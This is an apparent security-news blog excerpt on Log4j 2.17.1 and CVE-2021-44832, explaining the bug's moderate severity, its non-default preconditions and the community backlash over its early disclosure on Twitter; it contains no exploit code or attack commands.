Log4j 2.17.1 fixes another code execution bug, but should you worry?

Approx reading time: 6 mins

Yesterday, Apache released Log4j version 2.17.1, which squashes a newly discovered code execution bug, tracked as CVE-2021-44832. Our Log4j vulnerability resource center has since been updated to reflect ongoing download trends and statistics for 2.17.1.

But the quasi-alarming code execution bug isn’t as trivial to exploit as the original critical Log4Shell vulnerability (CVE-2021-44228) that set the internet on fire.

Before we dive further into the vulnerability details or if you need to worry about it, the possibility of an “RCE” flaw existing in Log4j 2.17.0 was initially brought up on Twitter by a researcher yesterday before any form of a formal disclosure took place. And this led to a storm of researchers from the InfoSec community flooding in to question and validate the claim.

Sponsorships Available

Sponsorships Available

Sponsorships Available

Fortunately, it was later clarified by the researcher that the bug is an arbitrary, rather than, remote code execution, exploitable under very specific circumstances—although both Apache’s advisory and the CVE entry classify the flaw as an “RCE.”

Screen capture of the initial Twitter post and reply.

This did not sit well with everyone in the community [1, 2, 3, 4] who had to dedicate significant time and effort towards investigating if the latest stable version prior to yesterday (Log4j 2.17.0), contained yet another serious vulnerability. Moreover, this came up during an unusually taxing holiday month for InfoSec professionals already underwater with the Log4j debacle.

Dissecting the Vulnerability

Assigned a ‘moderate’ severity and a 6.6 CVSS score, CVE-2021-44832 concerns non-default scenarios of Log4j versions from 2.0-beta7 up to and including 2.17.0 (but excluding backported releases 2.3.2 and 2.12.4). It also requires an attacker to have “write” permissions (Read more...)